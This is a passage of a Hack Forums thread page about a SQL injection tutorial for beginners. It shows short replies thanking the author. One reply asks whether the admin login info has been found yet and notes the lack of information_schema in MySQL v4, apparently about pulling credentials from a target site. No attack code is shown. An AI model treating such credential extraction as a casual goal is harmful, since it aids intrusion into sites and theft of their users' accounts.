rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=26080923" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26081137" id="pid26081137"></a><table class="tborder" style="margin-top: 5px; " id="post_26081137" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-02-2012, 05:37 AM <span id="edited_by_26081137"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=26081137#pid26081137">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"> <br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 135<br>Posts: 2,207<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">203</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26081137">Thanks z3r0r00ted and BlackRoas for your kind words :)</div><div class="post_meta" id="post_meta_26081137"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=26081137" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26087281" id="pid26087281"></a><table class="tborder" style="margin-top: 5px; " id="post_26087281" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-02-2012, 10:09 AM <span id="edited_by_26087281"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=26087281#pid26087281">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=927890"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/canstock10023506.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=927890"><span class="group9">CyberSyringe</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Web Exploitation Novice<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 12<br>Posts: 287<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=927890"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26087281">Have you found the admin login info yet?<br><br>Too bad there's no information_schema since it's v4.<br><br>:(</div><div class="post_meta" id="post_meta_26087281"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=927890" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=26087281" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26775449" id="pid26775449"></a><table class="tborder" style="margin-top: 5px; " id="post_26775449" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-27-2012, 11:59 AM <span id="edited_by_26775449"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=26775449#pid26775449">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457672"><span class="group2">dirtyhero</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 60<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457672"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26775449">thanks.lot of my question answered in this thread.</div><div class="post_meta" id="post_meta_26775449"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457672" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=26775449" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid27984188" id="pid27984188"></a><table class="tborder" style="margin-top: 5px; " id="post_27984188" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-09-2012, 09:51 PM <span id="edited_by_27984188"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=27984188#pid27984188">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852281"><span class="group2">Patalach</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 69<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=852281"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_27984188">Nice [tut] ajkaro thank you.<br>Lerning something day by day :)</div><div class="post_meta" id="post_meta_27984188"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=852281" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=27984188" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2811867">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=2811867" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2811867&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2811867.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->